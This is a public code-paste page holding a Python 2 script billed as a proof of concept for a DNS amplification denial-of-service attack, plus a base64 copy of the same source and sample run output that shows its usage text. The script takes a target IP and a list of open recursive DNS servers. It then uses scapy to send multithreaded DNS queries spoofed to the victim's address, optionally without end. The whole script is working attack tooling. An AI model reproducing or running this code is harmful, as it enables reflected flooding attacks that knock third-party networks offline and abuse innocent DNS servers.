Ideone.com

download

#
# DNS Amplification DOS Attack Script - Proof of Concept
#
#    Co-Authored Johnathin Ferretti and Pat Litke
#
#	Pat Litke		|	geudrik
#	Jonathin Ferretti	|	LISTERINe
#
#	January 2012
#
#
#
#	Dependencies
#		python-scapy
#		python-dnspython
#
#
 
 
# Basic imports to do simple I/O
from optparse import OptionParser
from string import lower
from os import path, system
 
# Ensure that switches are set before we do much of anything else.
#	This ensures that system resources aren't unnecessarily used
system("clear")
print "###########################################################"
print "###   DNS Amplification DOS Attack - Proof of Concept   ###"
print "###                                                     ###"
print "###   Co-Authored    :   LISTERINe and geudrik          ###"
print "###			Jon Ferretti & Pat Litke   ###"
print "###   Last Modified  :   January 2012                   ###"
print "###########################################################"
print "\n\n"
 
parser=OptionParser()
 
# Required Parameters
parser.add_option("-t", "--target", 
				action="store", dest="target",
				help="IP address of our target")
 
parser.add_option("-s", "--servers", 
				action="store", dest="servers",
				help="Path to our list of recursive DNS servers")
 
parser.add_option("-a", "--arecords", 
				action="store", dest="arecords",
				help="Path or our list of A-Name records")
 
# Optional Parameters
parser.add_option("-c", "--count", action="store", dest="count", default=5)
parser.add_option("-v", "--verbose", action="store_true", dest="verbose")
parser.add_option("--threads", action="store", dest="threads", default=1)
parser.add_option("--verify", action="store_true", dest="verify")
 
 
(options, args)=parser.parse_args()
 
# Check to see that at least -t -s and -a are set as they are required
if not options.target or not options.servers or not options.arecords:
	print "Options are as follows"
	print "-t           :   Target IP Address"
	print "-s           :   Path to Server File"
	print "-a           :   Path to A Record FIle"
	print "-c           :   -1 for infinite, \# of times to send packets"
	print "--verify     :   Verify that DNS servers are indeed recursive"
	print "-v           :   Set verbosity to true"
	print "--threads    :   Number of threads to spawn"
	print "\n"
	print "Example Usage\n"
	print "amplfiy.py -t 1.2.3.4 -s /usr/so.list -a /usr/arec.list -c \"-1\" --verify -v --threads=4"
	exit() 
 
else:
	print "All checks have passed successfully. You are about to launch"
	print " a DOS attack against "+options.target
	print "The following are the options passed..."
	print "Target          : "+options.target
	print "Servers         : "+options.servers
	print "A-Names         : "+options.arecords
	print "Send Count      : "+str(options.count)
	print "Verify Servers? : "+str(options.verify)
	print "Verbosity?      : "+str(options.verbose)
	print "Thread Count    : "+str(options.threads)
	proof=lower(raw_input("Are you sure you want to execute this attack?  (Y/N)"))
 
	if proof=="n":
		exit()
 
 
# Clear our buffer and continue on...	
system("clear");
 
 
 
 
 
 
 
 
 
 
##
#####
#####################################################
# Sanitation code for our DNS amplification script
#####################################################
#####
##
 
 
from dns import flags, resolver
from os import path, system
from sys import argv, stdout
from random import randrange, seed
from threading import Thread
import logging
 
 
# Supress IPv6 warnings...
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
 
 
### Sanitize our A-Records List
def pull_clean_servers(server_filename, verbose):
 
	# Populate our array serverlist
	try:
		handle	=	open(path.abspath(server_filename), "r")
		serverlist	=	handle.readlines()
		if verbose:
			print "Pre-sanitation: File opened and lines read"
 
	except:
		print "Bad filepath, cannot open file for reading "+server_filename
		exit()
 
	# For each server in our serverlist (see above), clean it
	clean	=	[]
	for server in serverlist:
 
		try:
			clean.append(server.strip())
			if verbose:
				print "Server Cleaned: "+server
 
		except:
			print "Unable to parse servername: "+server
			exit()
 
	print "\n=== Sanitation Complete ===\n\n"
	return clean
 
 
 
 
##
#####
####################################################
# Verification Code for our Name Servers
####################################################
#####
##
 
def verify_ns(nslist, verbose):
 
	if verbose:
		print "Now verifying nameservers..."
 
	verified = []
	for server in nslist:
		try:
			# Send our DNS request to the server
			answer = resolver.query(server)
 
			# Read DNS flags from response and check for RA flag
			DNSflags = (flags._to_text(answer.response.flags,
										flags._by_value,
										flags._flags_order)).split(" ")
 
			if "RA" in DNSflags:
				verified.append(server)
 
			if verbose:
				print "Server "+server+" is recursive"
 
		except:
			# Server is not recursive
			print "Server "+server+" is *NOT* recursive"
 
	return verified
 
##
#####
####################################################
# Thread Class to handle our our Multi Threading
####################################################
#####
##
 
class sender(Thread):
 
	# Define our __init__ struct
	def __init__(self, threadnum, data_package):
		Thread.__init__(self)
		self.data = data_package
		self.tnum = threadnum
		self.target = data_package[0]
		self.name_servers = data_package[1]
		self.A_records = data_package[2]
		self.send_limit = data_package[3]
		self.verbose = data_package[4]
 
	# Define our "push_dns_packets" struct
	def run(self):
		print "seeding..."
		seed()
		pac_num = 0
		while self. send_limit != pac_num:
			ns = self.name_servers[randrange(0,len(self.name_servers))]
			A_record = self.A_records[randrange(0,len(self.A_records))]
 
			if self.verbose:
				print "| Sending Packet: "+str(pac_num+1)+" |", "Thread Number:", str(self.tnum)+" |", "Target:", self.target+" |", "Name Server:", ns+" |", "A-Record:", A_record+" |"
 
			# Send the packet :D :D
			send(IP(dst=ns, src=self.target)/UDP()/DNS(rd=1,qd=DNSQR(qname=A_record)), verbose=0)
			pac_num+=1
 
 
	# Define our "run" struct
	#def run(self):
	#	self.push_DNS_packets(self.tnum, self.data[0], self.data[1], self.data[2], self.data[3], self.data[4])
 
 
 
 
 
 
 
 
##
#####
#####################################################
# Let's start assigning variables and threadding
#####################################################
#####
##
 
# Assign vars to be used in our threads. We'll do this one at a time to see where things break (if they do)
try:
	Target = options.target
except:
	print "Script Broke - Target assignment failed"
	exit()
 
 
try:
	Nameservers = pull_clean_servers(options.servers, options.verbose)
except:
	print "Script Broke - Nameservers assignment failed"
	exit()	
 
 
try: 
	A_Records = pull_clean_servers(options.arecords, options.verbose)
except:
	print "Script Broke - A_Records assignment failed."
	exit()
 
 
 
 
# Things are sanitized. Do we need to verify our name servers?
if options.verify:
	try:
		Nameservers = verify_ns(Nameservers, options.verbose)
		if options.verbose:
			print "Nameserver Verification Successful..."
 
	except:
		print "Errors were encountered (see above) in nameserver verification"
		print "You may continue, but the above nameservers will be ignored"
		ns_error=lower(raw_input("Would you like to still try the attack (suggest not)?  (Y/N) :"))
 
		if ns_error=="n":
			exit()
 
 
 
# Pause so we can see diagnostic output
finalcheck=lower(raw_input("This the last chance you get. Are you sure you want to continue?"))
print finalcheck
if finalcheck=="n":
	print "n"
	exit()
 
print "running"
 
# So here we go, lets fire up some threads
sendthreads = []
for thread in range(0,int(options.threads)):
	sendthreads.append(sender(thread+1, [Target, Nameservers, A_Records, int(options.count), options.verbose]))
	sendthreads[thread].start()

IwojIEROUyBBbXBsaWZpY2F0aW9uIERPUyBBdHRhY2sgU2NyaXB0IC0gUHJvb2Ygb2YgQ29uY2VwdAojCiMgICAgQ28tQXV0aG9yZWQgSm9obmF0aGluIEZlcnJldHRpIGFuZCBQYXQgTGl0a2UKIwojCVBhdCBMaXRrZQkJfAlnZXVkcmlrCiMJSm9uYXRoaW4gRmVycmV0dGkJfAlMSVNURVJJTmUKIwojCUphbnVhcnkgMjAxMgojCiMKIwojCURlcGVuZGVuY2llcwojCQlweXRob24tc2NhcHkKIwkJcHl0aG9uLWRuc3B5dGhvbgojCiMKCgojIEJhc2ljIGltcG9ydHMgdG8gZG8gc2ltcGxlIEkvTwpmcm9tIG9wdHBhcnNlIGltcG9ydCBPcHRpb25QYXJzZXIKZnJvbSBzdHJpbmcgaW1wb3J0IGxvd2VyCmZyb20gb3MgaW1wb3J0IHBhdGgsIHN5c3RlbQoKIyBFbnN1cmUgdGhhdCBzd2l0Y2hlcyBhcmUgc2V0IGJlZm9yZSB3ZSBkbyBtdWNoIG9mIGFueXRoaW5nIGVsc2UuCiMJVGhpcyBlbnN1cmVzIHRoYXQgc3lzdGVtIHJlc291cmNlcyBhcmVuJ3QgdW5uZWNlc3NhcmlseSB1c2VkCnN5c3RlbSgiY2xlYXIiKQpwcmludCAiIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiCnByaW50ICIjIyMgICBETlMgQW1wbGlmaWNhdGlvbiBET1MgQXR0YWNrIC0gUHJvb2Ygb2YgQ29uY2VwdCAgICMjIyIKcHJpbnQgIiMjIyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyMjIgpwcmludCAiIyMjICAgQ28tQXV0aG9yZWQgICAgOiAgIExJU1RFUklOZSBhbmQgZ2V1ZHJpayAgICAgICAgICAjIyMiCnByaW50ICIjIyMJCQlKb24gRmVycmV0dGkgJiBQYXQgTGl0a2UgICAjIyMiCnByaW50ICIjIyMgICBMYXN0IE1vZGlmaWVkICA6ICAgSmFudWFyeSAyMDEyICAgICAgICAgICAgICAgICAgICMjIyIKcHJpbnQgIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIgpwcmludCAiXG5cbiIKCnBhcnNlcj1PcHRpb25QYXJzZXIoKQoKIyBSZXF1aXJlZCBQYXJhbWV0ZXJzCnBhcnNlci5hZGRfb3B0aW9uKCItdCIsICItLXRhcmdldCIsIAoJCQkJYWN0aW9uPSJzdG9yZSIsIGRlc3Q9InRhcmdldCIsCgkJCQloZWxwPSJJUCBhZGRyZXNzIG9mIG91ciB0YXJnZXQiKQoKcGFyc2VyLmFkZF9vcHRpb24oIi1zIiwgIi0tc2VydmVycyIsIAoJCQkJYWN0aW9uPSJzdG9yZSIsIGRlc3Q9InNlcnZlcnMiLAoJCQkJaGVscD0iUGF0aCB0byBvdXIgbGlzdCBvZiByZWN1cnNpdmUgRE5TIHNlcnZlcnMiKQoKcGFyc2VyLmFkZF9vcHRpb24oIi1hIiwgIi0tYXJlY29yZHMiLCAKCQkJCWFjdGlvbj0ic3RvcmUiLCBkZXN0PSJhcmVjb3JkcyIsCgkJCQloZWxwPSJQYXRoIG9yIG91ciBsaXN0IG9mIEEtTmFtZSByZWNvcmRzIikKCiMgT3B0aW9uYWwgUGFyYW1ldGVycwpwYXJzZXIuYWRkX29wdGlvbigiLWMiLCAiLS1jb3VudCIsIGFjdGlvbj0ic3RvcmUiLCBkZXN0PSJjb3VudCIsIGRlZmF1bHQ9NSkKcGFyc2VyLmFkZF9vcHRpb24oIi12IiwgIi0tdmVyYm9zZSIsIGFjdGlvbj0ic3RvcmVfdHJ1ZSIsIGRlc3Q9InZlcmJvc2UiKQpwYXJzZXIuYWRkX29wdGlvbigiLS10aHJlYWRzIiwgYWN0aW9uPSJzdG9yZSIsIGRlc3Q9InRocmVhZHMiLCBkZWZhdWx0PTEpCnBhcnNlci5hZGRfb3B0aW9uKCItLXZlcmlmeSIsIGFjdGlvbj0ic3RvcmVfdHJ1ZSIsIGRlc3Q9InZlcmlmeSIpCgoKKG9wdGlvbnMsIGFyZ3MpPXBhcnNlci5wYXJzZV9hcmdzKCkKCiMgQ2hlY2sgdG8gc2VlIHRoYXQgYXQgbGVhc3QgLXQgLXMgYW5kIC1hIGFyZSBzZXQgYXMgdGhleSBhcmUgcmVxdWlyZWQKaWYgbm90IG9wdGlvbnMudGFyZ2V0IG9yIG5vdCBvcHRpb25zLnNlcnZlcnMgb3Igbm90IG9wdGlvbnMuYXJlY29yZHM6CglwcmludCAiT3B0aW9ucyBhcmUgYXMgZm9sbG93cyIKCXByaW50ICItdCAgICAgICAgICAgOiAgIFRhcmdldCBJUCBBZGRyZXNzIgoJcHJpbnQgIi1zICAgICAgICAgICA6ICAgUGF0aCB0byBTZXJ2ZXIgRmlsZSIKCXByaW50ICItYSAgICAgICAgICAgOiAgIFBhdGggdG8gQSBSZWNvcmQgRklsZSIKCXByaW50ICItYyAgICAgICAgICAgOiAgIC0xIGZvciBpbmZpbml0ZSwgXCMgb2YgdGltZXMgdG8gc2VuZCBwYWNrZXRzIgoJcHJpbnQgIi0tdmVyaWZ5ICAgICA6ICAgVmVyaWZ5IHRoYXQgRE5TIHNlcnZlcnMgYXJlIGluZGVlZCByZWN1cnNpdmUiCglwcmludCAiLXYgICAgICAgICAgIDogICBTZXQgdmVyYm9zaXR5IHRvIHRydWUiCglwcmludCAiLS10aHJlYWRzICAgIDogICBOdW1iZXIgb2YgdGhyZWFkcyB0byBzcGF3biIKCXByaW50ICJcbiIKCXByaW50ICJFeGFtcGxlIFVzYWdlXG4iCglwcmludCAiYW1wbGZpeS5weSAtdCAxLjIuMy40IC1zIC91c3Ivc28ubGlzdCAtYSAvdXNyL2FyZWMubGlzdCAtYyBcIi0xXCIgLS12ZXJpZnkgLXYgLS10aHJlYWRzPTQiCglleGl0KCkgCgkJCmVsc2U6CglwcmludCAiQWxsIGNoZWNrcyBoYXZlIHBhc3NlZCBzdWNjZXNzZnVsbHkuIFlvdSBhcmUgYWJvdXQgdG8gbGF1bmNoIgoJcHJpbnQgIiBhIERPUyBhdHRhY2sgYWdhaW5zdCAiK29wdGlvbnMudGFyZ2V0CglwcmludCAiVGhlIGZvbGxvd2luZyBhcmUgdGhlIG9wdGlvbnMgcGFzc2VkLi4uIgoJcHJpbnQgIlRhcmdldCAgICAgICAgICA6ICIrb3B0aW9ucy50YXJnZXQKCXByaW50ICJTZXJ2ZXJzICAgICAgICAgOiAiK29wdGlvbnMuc2VydmVycwoJcHJpbnQgIkEtTmFtZXMgICAgICAgICA6ICIrb3B0aW9ucy5hcmVjb3JkcwoJcHJpbnQgIlNlbmQgQ291bnQgICAgICA6ICIrc3RyKG9wdGlvbnMuY291bnQpCglwcmludCAiVmVyaWZ5IFNlcnZlcnM/IDogIitzdHIob3B0aW9ucy52ZXJpZnkpCglwcmludCAiVmVyYm9zaXR5PyAgICAgIDogIitzdHIob3B0aW9ucy52ZXJib3NlKQoJcHJpbnQgIlRocmVhZCBDb3VudCAgICA6ICIrc3RyKG9wdGlvbnMudGhyZWFkcykKCXByb29mPWxvd2VyKHJhd19pbnB1dCgiQXJlIHlvdSBzdXJlIHlvdSB3YW50IHRvIGV4ZWN1dGUgdGhpcyBhdHRhY2s/ICAoWS9OKSIpKQoJCglpZiBwcm9vZj09Im4iOgoJCWV4aXQoKQoKCiMgQ2xlYXIgb3VyIGJ1ZmZlciBhbmQgY29udGludWUgb24uLi4JCnN5c3RlbSgiY2xlYXIiKTsKCgoKCgoKCgoKCiMjCiMjIyMjCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgU2FuaXRhdGlvbiBjb2RlIGZvciBvdXIgRE5TIGFtcGxpZmljYXRpb24gc2NyaXB0CiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMjIyMjCiMjCgoKZnJvbSBkbnMgaW1wb3J0IGZsYWdzLCByZXNvbHZlcgpmcm9tIG9zIGltcG9ydCBwYXRoLCBzeXN0ZW0KZnJvbSBzeXMgaW1wb3J0IGFyZ3YsIHN0ZG91dApmcm9tIHJhbmRvbSBpbXBvcnQgcmFuZHJhbmdlLCBzZWVkCmZyb20gdGhyZWFkaW5nIGltcG9ydCBUaHJlYWQKaW1wb3J0IGxvZ2dpbmcKCgojIFN1cHJlc3MgSVB2NiB3YXJuaW5ncy4uLgpsb2dnaW5nLmdldExvZ2dlcigic2NhcHkucnVudGltZSIpLnNldExldmVsKGxvZ2dpbmcuRVJST1IpCmZyb20gc2NhcHkuYWxsIGltcG9ydCAqCgoKIyMjIFNhbml0aXplIG91ciBBLVJlY29yZHMgTGlzdApkZWYgcHVsbF9jbGVhbl9zZXJ2ZXJzKHNlcnZlcl9maWxlbmFtZSwgdmVyYm9zZSk6CgoJIyBQb3B1bGF0ZSBvdXIgYXJyYXkgc2VydmVybGlzdAoJdHJ5OgoJCWhhbmRsZQk9CW9wZW4ocGF0aC5hYnNwYXRoKHNlcnZlcl9maWxlbmFtZSksICJyIikKCQlzZXJ2ZXJsaXN0CT0JaGFuZGxlLnJlYWRsaW5lcygpCgkJaWYgdmVyYm9zZToKCQkJcHJpbnQgIlByZS1zYW5pdGF0aW9uOiBGaWxlIG9wZW5lZCBhbmQgbGluZXMgcmVhZCIKCglleGNlcHQ6CgkJcHJpbnQgIkJhZCBmaWxlcGF0aCwgY2Fubm90IG9wZW4gZmlsZSBmb3IgcmVhZGluZyAiK3NlcnZlcl9maWxlbmFtZQoJCWV4aXQoKQoKCSMgRm9yIGVhY2ggc2VydmVyIGluIG91ciBzZXJ2ZXJsaXN0IChzZWUgYWJvdmUpLCBjbGVhbiBpdAoJY2xlYW4JPQlbXQoJZm9yIHNlcnZlciBpbiBzZXJ2ZXJsaXN0OgoJCQoJCXRyeToKCQkJY2xlYW4uYXBwZW5kKHNlcnZlci5zdHJpcCgpKQoJCQlpZiB2ZXJib3NlOgoJCQkJcHJpbnQgIlNlcnZlciBDbGVhbmVkOiAiK3NlcnZlcgoKCQlleGNlcHQ6CgkJCXByaW50ICJVbmFibGUgdG8gcGFyc2Ugc2VydmVybmFtZTogIitzZXJ2ZXIKCQkJZXhpdCgpCgkKCXByaW50ICJcbj09PSBTYW5pdGF0aW9uIENvbXBsZXRlID09PVxuXG4iCglyZXR1cm4gY2xlYW4KCgoKCiMjCiMjIyMjCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBWZXJpZmljYXRpb24gQ29kZSBmb3Igb3VyIE5hbWUgU2VydmVycwojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMjIyMjCiMjCgpkZWYgdmVyaWZ5X25zKG5zbGlzdCwgdmVyYm9zZSk6CgoJaWYgdmVyYm9zZToKCQlwcmludCAiTm93IHZlcmlmeWluZyBuYW1lc2VydmVycy4uLiIKCgl2ZXJpZmllZCA9IFtdCglmb3Igc2VydmVyIGluIG5zbGlzdDoKCQl0cnk6CgkJCSMgU2VuZCBvdXIgRE5TIHJlcXVlc3QgdG8gdGhlIHNlcnZlcgoJCQlhbnN3ZXIgPSByZXNvbHZlci5xdWVyeShzZXJ2ZXIpCgoJCQkjIFJlYWQgRE5TIGZsYWdzIGZyb20gcmVzcG9uc2UgYW5kIGNoZWNrIGZvciBSQSBmbGFnCgkJCUROU2ZsYWdzID0gKGZsYWdzLl90b190ZXh0KGFuc3dlci5yZXNwb25zZS5mbGFncywKCQkJCQkJCQkJCWZsYWdzLl9ieV92YWx1ZSwKCQkJCQkJCQkJCWZsYWdzLl9mbGFnc19vcmRlcikpLnNwbGl0KCIgIikKCgkJCWlmICJSQSIgaW4gRE5TZmxhZ3M6CgkJCQl2ZXJpZmllZC5hcHBlbmQoc2VydmVyKQoJCQkKCQkJaWYgdmVyYm9zZToKCQkJCXByaW50ICJTZXJ2ZXIgIitzZXJ2ZXIrIiBpcyByZWN1cnNpdmUiCgoJCWV4Y2VwdDoKCQkJIyBTZXJ2ZXIgaXMgbm90IHJlY3Vyc2l2ZQoJCQlwcmludCAiU2VydmVyICIrc2VydmVyKyIgaXMgKk5PVCogcmVjdXJzaXZlIgoKCXJldHVybiB2ZXJpZmllZAoKIyMKIyMjIyMKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIFRocmVhZCBDbGFzcyB0byBoYW5kbGUgb3VyIG91ciBNdWx0aSBUaHJlYWRpbmcKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIyMjIwojIwoKY2xhc3Mgc2VuZGVyKFRocmVhZCk6CgoJIyBEZWZpbmUgb3VyIF9faW5pdF9fIHN0cnVjdAoJZGVmIF9faW5pdF9fKHNlbGYsIHRocmVhZG51bSwgZGF0YV9wYWNrYWdlKToKCQlUaHJlYWQuX19pbml0X18oc2VsZikKCQlzZWxmLmRhdGEgPSBkYXRhX3BhY2thZ2UKCQlzZWxmLnRudW0gPSB0aHJlYWRudW0KCQlzZWxmLnRhcmdldCA9IGRhdGFfcGFja2FnZVswXQoJCXNlbGYubmFtZV9zZXJ2ZXJzID0gZGF0YV9wYWNrYWdlWzFdCgkJc2VsZi5BX3JlY29yZHMgPSBkYXRhX3BhY2thZ2VbMl0KCQlzZWxmLnNlbmRfbGltaXQgPSBkYXRhX3BhY2thZ2VbM10KCQlzZWxmLnZlcmJvc2UgPSBkYXRhX3BhY2thZ2VbNF0KCgkjIERlZmluZSBvdXIgInB1c2hfZG5zX3BhY2tldHMiIHN0cnVjdAoJZGVmIHJ1bihzZWxmKToKCQlwcmludCAic2VlZGluZy4uLiIKCQlzZWVkKCkKCQlwYWNfbnVtID0gMAoJCXdoaWxlIHNlbGYuIHNlbmRfbGltaXQgIT0gcGFjX251bToKCQkJbnMgPSBzZWxmLm5hbWVfc2VydmVyc1tyYW5kcmFuZ2UoMCxsZW4oc2VsZi5uYW1lX3NlcnZlcnMpKV0KCQkJQV9yZWNvcmQgPSBzZWxmLkFfcmVjb3Jkc1tyYW5kcmFuZ2UoMCxsZW4oc2VsZi5BX3JlY29yZHMpKV0KCQkJCgkJCWlmIHNlbGYudmVyYm9zZToKCQkJCXByaW50ICJ8IFNlbmRpbmcgUGFja2V0OiAiK3N0cihwYWNfbnVtKzEpKyIgfCIsICJUaHJlYWQgTnVtYmVyOiIsIHN0cihzZWxmLnRudW0pKyIgfCIsICJUYXJnZXQ6Iiwgc2VsZi50YXJnZXQrIiB8IiwgIk5hbWUgU2VydmVyOiIsIG5zKyIgfCIsICJBLVJlY29yZDoiLCBBX3JlY29yZCsiIHwiCgoJCQkjIFNlbmQgdGhlIHBhY2tldCA6RCA6RAoJCQlzZW5kKElQKGRzdD1ucywgc3JjPXNlbGYudGFyZ2V0KS9VRFAoKS9ETlMocmQ9MSxxZD1ETlNRUihxbmFtZT1BX3JlY29yZCkpLCB2ZXJib3NlPTApCgkJCXBhY19udW0rPTEKCQoKCSMgRGVmaW5lIG91ciAicnVuIiBzdHJ1Y3QKCSNkZWYgcnVuKHNlbGYpOgoJIwlzZWxmLnB1c2hfRE5TX3BhY2tldHMoc2VsZi50bnVtLCBzZWxmLmRhdGFbMF0sIHNlbGYuZGF0YVsxXSwgc2VsZi5kYXRhWzJdLCBzZWxmLmRhdGFbM10sIHNlbGYuZGF0YVs0XSkKCgoKCgoKCgojIwojIyMjIwojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIExldCdzIHN0YXJ0IGFzc2lnbmluZyB2YXJpYWJsZXMgYW5kIHRocmVhZGRpbmcKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyMjIyMKIyMKCiMgQXNzaWduIHZhcnMgdG8gYmUgdXNlZCBpbiBvdXIgdGhyZWFkcy4gV2UnbGwgZG8gdGhpcyBvbmUgYXQgYSB0aW1lIHRvIHNlZSB3aGVyZSB0aGluZ3MgYnJlYWsgKGlmIHRoZXkgZG8pCnRyeToKCVRhcmdldCA9IG9wdGlvbnMudGFyZ2V0CmV4Y2VwdDoKCXByaW50ICJTY3JpcHQgQnJva2UgLSBUYXJnZXQgYXNzaWdubWVudCBmYWlsZWQiCglleGl0KCkKCgp0cnk6CglOYW1lc2VydmVycyA9IHB1bGxfY2xlYW5fc2VydmVycyhvcHRpb25zLnNlcnZlcnMsIG9wdGlvbnMudmVyYm9zZSkKZXhjZXB0OgoJcHJpbnQgIlNjcmlwdCBCcm9rZSAtIE5hbWVzZXJ2ZXJzIGFzc2lnbm1lbnQgZmFpbGVkIgoJZXhpdCgpCQoKCnRyeTogCglBX1JlY29yZHMgPSBwdWxsX2NsZWFuX3NlcnZlcnMob3B0aW9ucy5hcmVjb3Jkcywgb3B0aW9ucy52ZXJib3NlKQpleGNlcHQ6CglwcmludCAiU2NyaXB0IEJyb2tlIC0gQV9SZWNvcmRzIGFzc2lnbm1lbnQgZmFpbGVkLiIKCWV4aXQoKQoKCgoKIyBUaGluZ3MgYXJlIHNhbml0aXplZC4gRG8gd2UgbmVlZCB0byB2ZXJpZnkgb3VyIG5hbWUgc2VydmVycz8KaWYgb3B0aW9ucy52ZXJpZnk6Cgl0cnk6CgkJTmFtZXNlcnZlcnMgPSB2ZXJpZnlfbnMoTmFtZXNlcnZlcnMsIG9wdGlvbnMudmVyYm9zZSkKCQlpZiBvcHRpb25zLnZlcmJvc2U6CgkJCXByaW50ICJOYW1lc2VydmVyIFZlcmlmaWNhdGlvbiBTdWNjZXNzZnVsLi4uIgoKCWV4Y2VwdDoKCQlwcmludCAiRXJyb3JzIHdlcmUgZW5jb3VudGVyZWQgKHNlZSBhYm92ZSkgaW4gbmFtZXNlcnZlciB2ZXJpZmljYXRpb24iCgkJcHJpbnQgIllvdSBtYXkgY29udGludWUsIGJ1dCB0aGUgYWJvdmUgbmFtZXNlcnZlcnMgd2lsbCBiZSBpZ25vcmVkIgoJCW5zX2Vycm9yPWxvd2VyKHJhd19pbnB1dCgiV291bGQgeW91IGxpa2UgdG8gc3RpbGwgdHJ5IHRoZSBhdHRhY2sgKHN1Z2dlc3Qgbm90KT8gIChZL04pIDoiKSkKCgkJaWYgbnNfZXJyb3I9PSJuIjoKCQkJZXhpdCgpCgoKCiMgUGF1c2Ugc28gd2UgY2FuIHNlZSBkaWFnbm9zdGljIG91dHB1dApmaW5hbGNoZWNrPWxvd2VyKHJhd19pbnB1dCgiVGhpcyB0aGUgbGFzdCBjaGFuY2UgeW91IGdldC4gQXJlIHlvdSBzdXJlIHlvdSB3YW50IHRvIGNvbnRpbnVlPyIpKQpwcmludCBmaW5hbGNoZWNrCmlmIGZpbmFsY2hlY2s9PSJuIjoKCXByaW50ICJuIgoJZXhpdCgpCgpwcmludCAicnVubmluZyIKCiMgU28gaGVyZSB3ZSBnbywgbGV0cyBmaXJlIHVwIHNvbWUgdGhyZWFkcwpzZW5kdGhyZWFkcyA9IFtdCmZvciB0aHJlYWQgaW4gcmFuZ2UoMCxpbnQob3B0aW9ucy50aHJlYWRzKSk6CglzZW5kdGhyZWFkcy5hcHBlbmQoc2VuZGVyKHRocmVhZCsxLCBbVGFyZ2V0LCBOYW1lc2VydmVycywgQV9SZWNvcmRzLCBpbnQob3B0aW9ucy5jb3VudCksIG9wdGlvbnMudmVyYm9zZV0pKQoJc2VuZHRocmVhZHNbdGhyZWFkXS5zdGFydCgp

Success #stdin #stdout #stderr 0.13s 9936KB

stdin

Standard input is empty

stdout

###########################################################
###   DNS Amplification DOS Attack - Proof of Concept   ###
###                                                     ###
###   Co-Authored    :   LISTERINe and geudrik          ###
###			Jon Ferretti & Pat Litke   ###
###   Last Modified  :   January 2012                   ###
###########################################################



Options are as follows
-t           :   Target IP Address
-s           :   Path to Server File
-a           :   Path to A Record FIle
-c           :   -1 for infinite, \# of times to send packets
--verify     :   Verify that DNS servers are indeed recursive
-v           :   Set verbosity to true
--threads    :   Number of threads to spawn


Example Usage

amplfiy.py -t 1.2.3.4 -s /usr/so.list -a /usr/arec.list -c "-1" --verify -v --threads=4

stderr

TERM environment variable not set.

https://ideone.com/H0mpsI

language:

Python (cpython 2.7.16)

created:

visibility:

public

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!

Discover > Sphere Engine API

Discover > IDE Widget

Choose your language